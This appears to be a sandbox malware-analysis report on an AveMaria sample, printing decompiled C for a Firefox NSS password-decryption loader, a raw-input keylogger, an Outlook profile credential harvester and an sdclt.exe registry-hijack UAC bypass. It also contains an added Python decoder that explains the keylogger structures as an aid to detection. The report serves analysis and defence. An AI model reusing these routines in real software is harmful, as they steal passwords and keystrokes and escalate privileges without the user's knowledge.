                                  										 *((intOrPtr*)(_t216 + 0x74)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x78)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x6c)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x84)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
                                  										 *((intOrPtr*)(_t216 + 0x88)) = E00411E88( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
                                  										SetCurrentDirectoryW( &_v560);
                                  										_t158 = 1;
                                  									}
                                  								}
                                  							}
                                  							E00405FEB(_v24);
                                  							E00405FEB(_v28);
                                  							E00405FEB(_v32);
                                  							E00405FEB(_v36);
                                  							E00405FEB(_v16);
                                  							E00405FEB(_v20);
                                  							E00405FEB(_v40);
                                  							E00405FEB(_a4);
                                  							return _t158;
                                  						}
                                  						E00403549( &_v20,  &_v8);
                                  						E00405FEB(_v8);
                                  						goto L9;
                                  					}
                                  				}
                                  				E00403549( &_v16,  &_v8);
                                  				E00405FEB(_v8);
                                  				goto L5;
                                  			}


                                  APIs
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                  • LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                  • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                  • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                  • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                  • API String ID: 410702425-850564384
                                  • Opcode ID: 90bd920bbb0a6560635d9d5dfae8779ac1366cf738f4096b56dbd6cdce014c34
                                  • Instruction ID: adf04343739510be93e0c3051fa592f7aed2d6a863cdebd9eec2d50d860fb44a
                                  • Opcode Fuzzy Hash: 90bd920bbb0a6560635d9d5dfae8779ac1366cf738f4096b56dbd6cdce014c34
                                  • Instruction Fuzzy Hash: F3910C71A00609ABCB04EFA1DC92AEEBB79AF54304F10413FE515771E1DF38AA55CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00408793(void* __ecx, void* __eflags, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				char _v524;
                                  				short _v564;
                                  				intOrPtr _v568;
                                  				short _v570;
                                  				short _v572;
                                  				long _v596;
                                  				char _v600;
                                  				int _v604;
                                  				char _v612;
                                  				intOrPtr _v616;
                                  				struct _OVERLAPPED* _v620;
                                  				char _v624;
                                  				char _v628;
                                  				void* _v632;
                                  				char _v636;
                                  				intOrPtr _v640;
                                  				struct _OVERLAPPED* _v644;
                                  				char _v648;
                                  				void* _t76;
                                  				short _t77;
                                  				void* _t82;
                                  				char* _t84;
                                  				struct _OVERLAPPED** _t86;
                                  				long _t88;
                                  				intOrPtr _t93;
                                  				intOrPtr* _t96;
                                  				long _t100;
                                  				intOrPtr _t101;
                                  				WCHAR* _t102;
                                  				intOrPtr _t104;
                                  				void* _t105;
                                  				long _t109;
                                  				void* _t110;
                                  				intOrPtr _t111;
                                  				intOrPtr _t113;
                                  				long _t116;
                                  				intOrPtr _t117;
                                  				intOrPtr _t119;
                                  				long _t121;
                                  				intOrPtr _t122;
                                  				intOrPtr _t124;
                                  				void* _t126;
                                  				intOrPtr _t128;
                                  				intOrPtr _t130;
                                  				long _t132;
                                  				intOrPtr _t133;
                                  				intOrPtr _t135;
                                  				DWORD* _t136;
                                  				long _t137;
                                  				intOrPtr _t138;
                                  				long _t142;
                                  				void* _t152;
                                  				long _t164;
                                  				intOrPtr _t178;
                                  				intOrPtr _t189;
                                  				void* _t195;
                                  				struct _OVERLAPPED* _t198;
                                  				struct _OVERLAPPED* _t201;
                                  				void* _t204;
                                  				void* _t206;
                                  				void* _t208;
                                  				signed int _t209;
                                  				void* _t212;
                                  				void* _t213;
                                  
                                  				_t198 = 0;
                                  				_v600 = 0;
                                  				E00401052( &_v524, 0, 0x208);
                                  				_t212 = (_t209 & 0xfffffff8) - 0x25c + 0xc;
                                  				_t201 = 0;
                                  				_v604 = 0;
                                  				_t76 = _a8 - 1;
                                  				if(_t76 == 0) {
                                  					_t77 = 6;
                                  					_v570 = _t77;
                                  					__eflags = 1;
                                  					_v564 = _a4;
                                  					_v568 = 0x130;
                                  					_v572 = 1;
                                  					__imp__RegisterRawInputDevices( &_v572, 1, 0xc);
                                  				} else {
                                  					_t82 = _t76 - 0xf;
                                  					if(_t82 == 0) {
                                  						PostQuitMessage(0);
                                  					} else {
                                  						if(_t82 == 0xef) {
                                  							_t84 =  &_v600;
                                  							__imp__GetRawInputData(_a16, 0x10000003, 0, _t84, 0x10);
                                  							__eflags = _t84 - 0xffffffff;
                                  							if(_t84 != 0xffffffff) {
                                  								_t164 = E00406099(_v620);
                                  								_v596 = _t164;
                                  								__eflags = _t164;
                                  								if(_t164 != 0) {
                                  									_t86 =  &_v620;
                                  									__imp__GetRawInputData(_a16, 0x10000003, _t164, _t86, 0x10);
                                  									__eflags = _t86 - _v640;
                                  									if(_t86 == _v640) {
                                  										__eflags =  *((intOrPtr*)(_t164 + 0x18)) - 0x100;
                                  										if( *((intOrPtr*)(_t164 + 0x18)) == 0x100) {
                                  											_t88 = GetWindowTextW(GetForegroundWindow(),  &_v564, 0x104);
                                  											__eflags = _t88;
                                  											if(_t88 <= 0) {
                                  												E00403411( &_v644, _t195, L"Unknow");
                                  											} else {
                                  												E00403549( &_v648, E004036F7( &_v636,  &_v564));
                                  												E00405FEB(_v644);
                                  											}
                                  											E00408C13( &_v632,  *((intOrPtr*)(_t164 + 0x16)));
                                  											E00403549( &_v632,  &_v644);
                                  											_t93 =  *0x42675c; // 0x0
                                  											E0040357C( &_v624,  *((intOrPtr*)(_t164 + 0x16)), __eflags, _t93 + 0x10);
                                  											_t96 =  *0x42675c; // 0x0
                                  											__eflags =  *_t96 - _t198;
                                  											if( *_t96 != _t198) {
                                  												_t213 = _t212 - 0x10;
                                  												__eflags = _t96 + 0xa18;
                                  												E004013B3(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                  												_t208 = _t213 - 0x10;
                                  												E0040373F(_t208,  &_v636);
                                  												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                  												 *((short*)(_t208 + 8)) = _v632;
                                  												E0040373F(_t208 + 0xc,  &_v628);
                                  												_t152 = E00404A78( &_v612, __eflags);
                                  												_t189 =  *0x42675c; // 0x0
                                  												E00405044( *((intOrPtr*)(_t189 + 0xa50)), _t152);
                                  												E00404A4E( &_v648);
                                  												_t96 =  *0x42675c; // 0x0
                                  											}
                                  											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                  											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                  												_t100 = lstrlenW(_t96 + 0x210);
                                  												__eflags = _t100;
                                  												_t101 =  *0x42675c; // 0x0
                                  												if(_t100 == 0) {
                                  													L17:
                                  													_t102 = _t101 + 0x210;
                                  													__eflags = _t102;
                                  													lstrcpyW(_t102, _v632);
                                  													_t104 =  *0x42675c; // 0x0
                                  													 *(_t104 + 0xa10) = _t198;
                                  												} else {
                                  													_t142 = E0040335A( &_v648, E004036F7( &_v636, _t101 + 0x210));
                                  													E00405FEB(_v644);
                                  													_t101 =  *0x42675c; // 0x0
                                  													_v644 = _t198;
                                  													__eflags = _t142;
                                  													if(_t142 == 0) {
                                  														goto L17;
                                  													} else {
                                  														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                  													}
                                  												}
                                  												_t105 = CreateFileW( *(_t104 + 0xc), 4, 1, _t198, 4, 0x80, _t198);
                                  												_t178 =  *0x42675c; // 0x0
                                  												 *(_t178 + 4) = _t105;
                                  												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                  												if(__eflags == 0) {
                                  													_t49 = _t178 + 8; // 0x8
                                  													_t204 = L"\r\n";
                                  													_t116 = lstrlenW(_t204);
                                  													_t117 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t117 + 4), _t204, _t116, _t49, _t198);
                                  													_t119 =  *0x42675c; // 0x0
                                  													_t121 = lstrlenW(_t204);
                                  													_t122 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t122 + 4), _t204, _t121, _t119 + 8, _t198);
                                  													_t124 =  *0x42675c; // 0x0
                                  													_t126 = E00403373( &_v632);
                                  													_t128 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t128 + 4), _v632, _t126 + _t126, _t124 + 8, _t198);
                                  													_t130 =  *0x42675c; // 0x0
                                  													_t206 = L"\r\n";
                                  													_t132 = lstrlenW(_t206);
                                  													_t133 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t133 + 4), _t206, _t132, _t130 + 8, _t198);
                                  													_t135 =  *0x42675c; // 0x0
                                  													_t136 = _t135 + 8;
                                  													__eflags = _t136;
                                  													_t137 = lstrlenW(_t206);
                                  													_t138 =  *0x42675c; // 0x0
                                  													WriteFile( *(_t138 + 4), _t206, _t137, _t136, _t198);
                                  													_t178 =  *0x42675c; // 0x0
                                  												}
                                  												_t58 = _t178 + 8; // 0x8
                                  												_t109 = lstrlenW(E00408B2D( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                  												__eflags = _t109;
                                  												_t110 = E00408B2D( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                  												_t111 =  *0x42675c; // 0x0
                                  												WriteFile( *(_t111 + 4), _t110, _t109, _t58, _t198);
                                  												_t113 =  *0x42675c; // 0x0
                                  												CloseHandle( *(_t113 + 4));
                                  											}
                                  											E00405FEB(_v620);
                                  											_v620 = _t198;
                                  											E00405FEB(_v632);
                                  											_t201 = _v644;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_t201);
                                  				return _t198;
			}

			Instruction addresses for the statements of this function (the report's per-line address column, which extraction separated from the code): 0x004087a2 through 0x00408b2a.

                                  APIs
                                  • DefWindowProcA.USER32(?,?,?,?), ref: 004087E9
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00408806
                                  • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 0040883C
                                  • GetForegroundWindow.USER32 ref: 00408859
                                  • GetWindowTextW.USER32 ref: 0040886A
                                  • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 00408953
                                  • PostQuitMessage.USER32 ref: 00408AE6
                                  • RegisterRawInputDevices.USER32 ref: 00408B15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                  • String ID: Unknow
                                  • API String ID: 3853268301-1240069140
                                  • Opcode ID: 1c18732a75042ba1516d45dd31a5679db3b9db88792648d788053113c3b00f7a
                                  • Instruction ID: 458c7b85aa02a6c7404881c9d8865e4587a04225f5986bfff7961e81c5bb117e
                                  • Opcode Fuzzy Hash: 1c18732a75042ba1516d45dd31a5679db3b9db88792648d788053113c3b00f7a
                                  • Instruction Fuzzy Hash: BEA18E71204200AFC710EF65DC89EAB7BB8EF84344F44857EF985A72A1DB35D905CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%
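The procedure above is a raw-input keylogger. On message 1 (WM_CREATE) it fills a 12-byte RAWINPUTDEVICE with usage page 1 / usage 6 (the keyboard) and dwFlags 0x130, on message 0xFF (WM_INPUT, reached as 1 + 0xf + 0xef) it fetches the packet with uiCommand 0x10000003 (RID_INPUT), keeps only packets whose field at offset 0x18 equals 0x100 (RAWKEYBOARD.Message == WM_KEYDOWN), takes the virtual key from offset 0x16 (RAWKEYBOARD.VKey), and prefixes each key with the title of GetForegroundWindow() before appending to its log file. Flag 0x100 (RIDEV_INPUTSINK) is what lets the hidden window receive keystrokes while it is not in the foreground, which is why the foreground-window lookup is needed at all. The Python below is an added example written for readers of this report, not code from the sample or from the sandbox: it decodes the registration block and parses packets using the documented 32-bit Win32 layouts (the sample is x86). The packets and handle values in it are constructed placeholders.

```python
"""Decode the raw-input keylogger setup in the window procedure above.

Added example, not code from the sample or from the report. Structure layouts
and constants are the documented Win32 ones for a 32-bit process; the packets
below are constructed test data, not bytes captured from the sample.
"""
import struct
from typing import Dict, List, Optional

# RAWINPUTDEVICE.dwFlags bits (winuser.h). RIDEV_NOLEGACY is the bit pair 0x30.
RIDEV_NOLEGACY = 0x00000030
RIDEV_SINGLE_BITS = {
    0x00000001: "RIDEV_REMOVE",
    0x00000010: "RIDEV_EXCLUDE",
    0x00000020: "RIDEV_PAGEONLY",
    0x00000100: "RIDEV_INPUTSINK",
    0x00000200: "RIDEV_CAPTUREMOUSE",  # same bit is RIDEV_NOHOTKEYS for keyboards
    0x00000400: "RIDEV_APPKEYS",
    0x00001000: "RIDEV_EXINPUTSINK",
    0x00002000: "RIDEV_DEVNOTIFY",
}
HID_USAGE = {(1, 2): "Mouse", (1, 6): "Keyboard"}  # (usUsagePage, usUsage) on the Generic Desktop page
RID_COMMANDS = {0x10000003: "RID_INPUT", 0x10000005: "RID_HEADER"}
RIM_TYPEKEYBOARD = 1
WM_KEYDOWN = 0x0100

# 32-bit layouts. RAWINPUTHEADER {dwType, dwSize, hDevice, wParam} is 0x10 bytes,
# the size the sample passes to GetRawInputData; RAWKEYBOARD follows it directly.
RAWINPUTDEVICE_FMT = "<HHII"    # usUsagePage, usUsage, dwFlags, hwndTarget (0xc bytes)
RAWINPUTHEADER_FMT = "<IIII"
RAWKEYBOARD_FMT = "<HHHHII"     # MakeCode, Flags, Reserved, VKey, Message, ExtraInformation
OFF_VKEY = struct.calcsize(RAWINPUTHEADER_FMT) + struct.calcsize("<HHH")      # 0x16, read as *(_t164 + 0x16)
OFF_MESSAGE = struct.calcsize(RAWINPUTHEADER_FMT) + struct.calcsize("<HHHH")  # 0x18, compared with 0x100


def decode_ridev_flags(flags: int) -> List[str]:
    """Name every flag bit in a RAWINPUTDEVICE.dwFlags value."""
    names = []
    if flags & RIDEV_NOLEGACY == RIDEV_NOLEGACY:
        names.append("RIDEV_NOLEGACY")
        flags &= ~RIDEV_NOLEGACY
    for bit, name in sorted(RIDEV_SINGLE_BITS.items()):
        if flags & bit:
            names.append(name)
            flags &= ~bit
    if flags:
        names.append("UNKNOWN_0x%x" % flags)
    return names


def decode_rawinputdevice(buf: bytes) -> Dict[str, object]:
    """Decode the 12-byte RAWINPUTDEVICE handed to RegisterRawInputDevices."""
    page, usage, flags, hwnd = struct.unpack_from(RAWINPUTDEVICE_FMT, buf, 0)
    return {
        "usUsagePage": page,
        "usUsage": usage,
        "device": HID_USAGE.get((page, usage), "other"),
        "dwFlags": decode_ridev_flags(flags),
        "hwndTarget": hwnd,
    }


def parse_rawinput_keyboard(buf: bytes) -> Optional[Dict[str, int]]:
    """Parse a RAWINPUT packet from GetRawInputData(RID_INPUT); None unless it is keyboard data."""
    dw_type, dw_size, h_device, _w_param = struct.unpack_from(RAWINPUTHEADER_FMT, buf, 0)
    if dw_type != RIM_TYPEKEYBOARD or dw_size > len(buf):
        return None
    make_code, kb_flags, _reserved, vkey, message, extra = struct.unpack_from(
        RAWKEYBOARD_FMT, buf, struct.calcsize(RAWINPUTHEADER_FMT))
    return {"hDevice": h_device, "MakeCode": make_code, "Flags": kb_flags,
            "VKey": vkey, "Message": message, "ExtraInformation": extra}


def keystroke_logged_by_sample(buf: bytes) -> Optional[int]:
    """Mirror the handler's filter: only WM_KEYDOWN packets reach the log; returns the VKey or None."""
    ev = parse_rawinput_keyboard(buf)
    if ev is None or ev["Message"] != WM_KEYDOWN:
        return None
    return ev["VKey"]


# Constructed data. The registration block reproduces the values the decompiled
# code stores in _v572.._v564 (usage page 1, usage 6, flags 0x130); the hwnd and
# hDevice are placeholders. The two packets are a made-up 'A' key down and key up.
SAMPLE_RAWINPUTDEVICE = struct.pack(RAWINPUTDEVICE_FMT, 1, 6, 0x130, 0x000A0B0C)
SAMPLE_KEYDOWN = (struct.pack(RAWINPUTHEADER_FMT, RIM_TYPEKEYBOARD, 0x20, 0x1234, 0)
                  + struct.pack(RAWKEYBOARD_FMT, 0x1E, 0, 0, 0x41, WM_KEYDOWN, 0))
SAMPLE_KEYUP = (struct.pack(RAWINPUTHEADER_FMT, RIM_TYPEKEYBOARD, 0x20, 0x1234, 0)
                + struct.pack(RAWKEYBOARD_FMT, 0x1E, 1, 0, 0x41, 0x0101, 0))

if __name__ == "__main__":
    print(decode_rawinputdevice(SAMPLE_RAWINPUTDEVICE))
    print(hex(OFF_VKEY), hex(OFF_MESSAGE))
    print(keystroke_logged_by_sample(SAMPLE_KEYDOWN), keystroke_logged_by_sample(SAMPLE_KEYUP))
```

Run stand-alone it prints the decoded registration (Keyboard, RIDEV_NOLEGACY | RIDEV_INPUTSINK), the two field offsets the decompiler shows as raw constants, and the virtual key for the key-down packet only. The same two offsets are a convenient anchor when matching this handler in other AveMaria builds: a GetRawInputData(RID_INPUT) call followed by a compare of [buf+0x18] against 0x100 and a read of [buf+0x16] is the whole keystroke filter.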

                                  C-Code - Quality: 85%
                                  			E0040983D(intOrPtr __ecx, void* __edx, void* __eflags) {
                                  				void* _v8;
                                  				int _v12;
                                  				int _v16;
                                  				intOrPtr _v20;
                                  				short _v4116;
                                  				short _v8212;
                                  				short _v12308;
                                  				long _t68;
                                  				int _t74;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				short* _t80;
                                  
                                  				_t76 = __edx;
                                  				_t75 = __ecx;
                                  				E004011C0(0x3014, __ecx);
                                  				_v20 = _t75;
                                  				_t74 = 0;
                                  				E00401052( &_v4116, 0, 0x800);
                                  				E00401052( &_v8212, 0, 0x800);
                                  				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                  					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                  					if(__eflags != 0) {
                                  						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                  						if(__eflags != 0) {
                                  							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                  							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                  							if(__eflags != 0) {
                                  								L15:
                                  								__eflags = 0;
                                  								return 0;
                                  							}
                                  							_push(_t80);
                                  							L8:
                                  							lstrcpyW( &_v4116, ??);
                                  							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                  								goto L15;
                                  							}
                                  							if(_v16 <= _t74) {
                                  								L14:
                                  								return 1;
                                  							} else {
                                  								goto L10;
                                  							}
                                  							while(1) {
                                  								L10:
                                  								_v12 = 0x800;
                                  								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                  									goto L15;
                                  								}
                                  								RegCloseKey(_v8);
                                  								lstrcpyW( &_v8212,  &_v4116);
                                  								lstrcatW( &_v8212, "\\");
                                  								lstrcatW( &_v8212,  &_v12308);
                                  								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                  								_t90 = _t68;
                                  								if(_t68 != 0) {
                                  									goto L15;
                                  								}
                                  								_push(_t75);
                                  								_t75 = _v20;
                                  								E004099FF(_t75, _t76, _t90, _v8);
                                  								RegCloseKey(_v8);
                                  								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                  									goto L15;
                                  								}
                                  								_t74 = _t74 + 1;
                                  								if(_t74 < _v16) {
                                  									continue;
                                  								}
                                  								goto L14;
                                  							}
                                  							goto L15;
                                  						}
                                  						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                  						goto L8;
                                  					}
                                  					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                  					goto L8;
                                  				}
                                  				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                  				goto L8;
			}

			Instruction addresses for the statements of E0040983D (the report's per-line address column, which extraction separated from the code): 0x0040983d through 0x004099f8.

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00409894
                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 004098B1
                                  • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00409904
                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040991A
                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040994D
                                  • RegCloseKey.ADVAPI32(?), ref: 0040995E
                                  • lstrcpyW.KERNEL32(?,?), ref: 00409972
                                  • lstrcatW.KERNEL32 ref: 00409980
                                  • lstrcatW.KERNEL32 ref: 00409994
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099B1
                                  • RegCloseKey.ADVAPI32(?,?), ref: 004099C6
                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 004099E3
                                  Strings
                                  • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                  • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                  • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                  • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                  • API String ID: 1891545080-2020977430
                                  • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                  • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                  • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0041313A(void* __edx, void* __eflags) {
                                  				void* _v8;
                                  				char _v12;
                                  				struct _SHELLEXECUTEINFOW _v72;
                                  				short _v592;
                                  				char _v1616;
                                  				short* _t53;
                                  
                                  				if(E0041111B() != 1) {
                                  					CloseHandle( *0x559cb0);
                                  					_v8 = 0;
                                  					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                  					if(_v8 != 0) {
                                  						_t47 =  &_v12;
                                  						E00410CFF( &_v12);
                                  					}
                                  					E00412E91();
                                  					E00401052( &_v1616, 0, 0x400);
                                  					GetModuleFileNameA(0,  &_v1616, 0x400);
                                  					E00412E2C(_t47, 0x418fe6,  &_v1616);
                                  					E00412E2C(_t47, "DelegateExecute", 0x418fe6);
                                  					GetSystemDirectoryW( &_v592, 0x104);
                                  					lstrcatW( &_v592, L"\\sdclt.exe");
                                  					_t53 = L"open";
                                  					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
                                  					asm("movaps xmm0, [0x41a900]");
                                  					_v72.lpFile =  &_v592;
                                  					_v72.cbSize = 0x3c;
                                  					_v72.fMask = 0x40;
                                  					_v72.hwnd = 0;
                                  					_v72.lpVerb = _t53;
                                  					asm("movups [ebp-0x30], xmm0");
                                  					ShellExecuteExW( &_v72);
                                  					TerminateProcess(_v72.hProcess, 0);
                                  					if(_v8 != 0) {
                                  						E00410CD8( &_v12);
                                  					}
                                  					Sleep(0x7d0);
                                  					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
                                  					ExitProcess(0);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                  • CloseHandle.KERNEL32(?), ref: 00413159
                                  • GetCurrentProcess.KERNEL32(?), ref: 00413168
                                  • IsWow64Process.KERNEL32(00000000), ref: 0041316F
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 004131A6
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004131D8
                                  • lstrcatW.KERNEL32 ref: 004131EA
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00413202
                                  • ShellExecuteExW.SHELL32(?), ref: 00413234
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041323E
                                  • Sleep.KERNEL32(000007D0), ref: 00413256
                                  • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00413266
                                  • ExitProcess.KERNEL32 ref: 0041326D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                  • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                  • API String ID: 3164795406-2081737068
                                  • Opcode ID: ae089f91786c736a999eee3c03bc7e6616984a4c0578babaebd9b9898cddf797
                                  • Instruction ID: 1975b8516974a034e8a1e4695efa9b733e37ae44b87f84d9a85a70a28b88c4fa
